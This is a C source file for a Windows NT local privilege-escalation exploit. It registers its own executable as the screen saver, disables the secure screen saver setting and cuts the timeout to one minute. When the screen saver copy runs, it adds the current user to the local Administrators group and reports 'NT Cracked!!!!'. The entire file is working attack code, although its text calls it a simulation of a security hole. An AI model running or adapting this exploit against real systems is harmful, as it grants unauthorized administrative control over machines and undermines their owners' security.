#include <windows.h>
#include <stdio.h>
#include <lmaccess.h>
#include <lmerr.h>

char gScreenSaverExeName[MAX_PATH];
BOOL gScreenSaverIsSecure;
DWORD gScreenSaverTimeout;
BOOL gScreenSaverActive;

BOOL bScreenSaverExeNamePresent;


#pragma data_seg("sdata")
WCHAR FullUserName[2000]=L"";
WCHAR AdminGroupName[2000]=L"";
char Message[2000]="";
#pragma data_seg()

StoreUserName()
{
	HANDLE hProcess, hAccessToken;
	UCHAR InfoBuffer[1000];
	PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;
	DWORD dwInfoBufferSize;
	WCHAR szAccountName[1000]=L"", szDomainName[1000]=L"";
	DWORD dwAccountSize = sizeof(szAccountName), dwDomainSize = sizeof(szDomainName);
	SID_NAME_USE snu;

	hProcess = GetCurrentProcess();

	if (OpenProcessToken(hProcess,TOKEN_READ,&hAccessToken)==FALSE) {
		printf("Unable to open process token\n");
		return FALSE;
			
	}

	if (GetTokenInformation(hAccessToken,TokenUser,InfoBuffer,
		sizeof(InfoBuffer), &dwInfoBufferSize)==FALSE) {
		printf("Unable to get token information\n");
		return FALSE;
	}


	if (LookupAccountSidW(NULL, pTokenUser->User.Sid, szAccountName,
		&dwAccountSize,szDomainName, &dwDomainSize, &snu)==FALSE) {
		printf("Unable to get lookup account sid\n");
		return FALSE;
	}
	wcscpy(FullUserName, szDomainName);
	wcscat(FullUserName, L"\\");
	wcscat(FullUserName, szAccountName);

	return TRUE;
}


BOOL SetupScreenSaver(char *ScreenSaverExe)
{
	LONG rc;
	HKEY hKey;
	BOOL SPIrc;
	DWORD ValueType;
	char Buffer[MAX_PATH];
	DWORD ValueSize;

	/* Store the screen saver state */
	SPIrc=SystemParametersInfo(SPI_GETSCREENSAVEACTIVE,
						 0,
						 &gScreenSaverActive,
						 0);
	if (SPIrc==FALSE) {
		printf("SystemParametersInfo get failed on gScreenSaverActive\n");
		return FALSE;
	}

	/* Store the screen saver timeout value */
	SPIrc=SystemParametersInfo(SPI_GETSCREENSAVETIMEOUT,
						 0,
						 &gScreenSaverTimeout,
						 0);
	if (SPIrc==FALSE) {
		printf("SystemParametersInfo failed on gScreenSaverTimeout\n");
		return FALSE;
	}


	rc=RegOpenKey(HKEY_CURRENT_USER, "Control Panel\\Desktop", &hKey);

	if (rc!=ERROR_SUCCESS) {
		return FALSE;
	}


	/* Store the screen saver exe name */
	ValueType=REG_SZ;
	ValueSize=sizeof(Buffer);
	rc=RegQueryValueEx(hKey,
					"SCRNSAVE.EXE",
					NULL,
					&ValueType,
					Buffer,
					&ValueSize);
	if (rc!=ERROR_SUCCESS) {
		bScreenSaverExeNamePresent=FALSE;
	} else {
		strcpy(gScreenSaverExeName, Buffer);
		bScreenSaverExeNamePresent=TRUE;
	}


	/* Store the screen saver security state */
	ValueType=REG_SZ;
	ValueSize=sizeof(Buffer);
	rc=RegQueryValueEx(hKey,
					"ScreenSaverIsSecure",
					NULL,
					&ValueType,
					Buffer,
					&ValueSize);
	gScreenSaverIsSecure=atoi(Buffer);

	/* Apply new screen saver */
	RegSetValueEx(hKey,
					"ScreenSaverIsSecure",
					0,
					REG_SZ,
					"0",
					2);

	RegSetValueEx(hKey,
					"SCRNSAVE.EXE",
					0,
					REG_SZ,
					ScreenSaverExe,
					strlen(ScreenSaverExe)+1);

	RegCloseKey(hKey);

	SPIrc=SystemParametersInfo(SPI_SETSCREENSAVEACTIVE,
					 TRUE,
					 0,
					 SPIF_UPDATEINIFILE);
	if (SPIrc==FALSE) {
		printf("SystemParametersInfo set failed on gScreenSaverActive\n");
		return FALSE;
	}
	SPIrc=SystemParametersInfo(SPI_SETSCREENSAVETIMEOUT,
					 1,
					 0,
					 SPIF_UPDATEINIFILE);
	if (SPIrc==FALSE) {
		printf("SystemParametersInfo set failed on gScreenSaverTimeout\n");
		return FALSE;
	}
	return TRUE;
}

BOOL RestoreScreenSaver()
{
	LONG rc;
	HKEY hKey;
	BOOL SPIrc;

	rc=RegOpenKey(HKEY_CURRENT_USER, "Control Panel\\Desktop", &hKey);

	if (rc!=ERROR_SUCCESS) {
		return FALSE;
	}

	RegSetValueEx(hKey,
					"ScreenSaverIsSecure",
					0,
					REG_SZ,
					gScreenSaverIsSecure?"1":"0",
					2);

	if (bScreenSaverExeNamePresent) {
		RegSetValueEx(hKey,
						"SCRNSAVE.EXE",
						0,
						REG_SZ,
						gScreenSaverExeName,
						strlen(gScreenSaverExeName)+1);
	} else {
		RegDeleteValue(hKey,
						"SCRNSAVE.EXE");
	}
	RegCloseKey(hKey);

	SPIrc=SystemParametersInfo(SPI_SETSCREENSAVEACTIVE,
							gScreenSaverActive?TRUE:FALSE,
							 0,
							 SPIF_UPDATEINIFILE);
	if (SPIrc==FALSE) {
		printf("SystemParametersInfo set failed on gScreenSaverActive\n");
		return FALSE;
	}
	SPIrc=SystemParametersInfo(SPI_SETSCREENSAVETIMEOUT,
					 gScreenSaverTimeout,
					 0,
					 SPIF_UPDATEINIFILE);
	if (SPIrc==FALSE) {
		printf("SystemParametersInfo set failed on gScreenSaverTimeout\n");
		return FALSE;
	}
}

void AddUserToLocalAdminGroup(WCHAR *FullUserName)
{
	NET_API_STATUS rc;
	LOCALGROUP_MEMBERS_INFO_3 MemberInfo[3];

	MemberInfo[0].lgrmi3_domainandname=FullUserName;

	rc=NetLocalGroupAddMembers(NULL,
							AdminGroupName,
							3,
							(LPBYTE)MemberInfo,
							1);

	if (rc==NERR_Success) {
		strcpy(Message, "NT Cracked!!!! User added to the local administrator group");
	} else if (rc==ERROR_MEMBER_IN_ALIAS) {
		strcpy(Message, "User already belongs to local administrator group");
	} else {
		sprintf(Message, "Unable to add user to local administrator group, rc=%x %d\n"
			"Make sure that you are running on Windows NT 3.51 or 4.0 with service pack 1 or NT 5.0 betas\n"
			"This simulation of security hole works only in above mentioned cases.\n", rc, rc);
	}
}

main(int argc, char **argv)
{
	HANDLE hEvent;

	hEvent=CreateEvent(NULL,
						FALSE,
						FALSE,
						"MyEvent");
	if (hEvent==NULL) {
		printf("hEvent Error\n");
		getchar();
		return 0;
	}

	if (GetLastError()==ERROR_ALREADY_EXISTS) {
		/*printf("Now I will add the user to admin group\n");
		printf("FullUser name = %S\n", FullUserName);*/
		AddUserToLocalAdminGroup(FullUserName);
		SetEvent(hEvent);
		return 0;
	} else {
		char *p;
		char NewScreenSaverExeName[MAX_PATH];

		if (argc>1) {
			wsprintfW(AdminGroupName, L"%hS", argv[1]);
		} else {
			wcscpy(AdminGroupName, L"Administrators");
		}


		StoreUserName();

		GetModuleFileName(NULL, 
							NewScreenSaverExeName,
							sizeof(NewScreenSaverExeName));


		p=strrchr(NewScreenSaverExeName, '\\');
		if (p) {
			strcpy(p+1, "SCRNSAVE.EXE");
			SetupScreenSaver(NewScreenSaverExeName);
			printf("Please wait ...\n");
			WaitForSingleObject(hEvent, INFINITE);
			RestoreScreenSaver();
			printf("%s\n", Message);
		}
	}
}
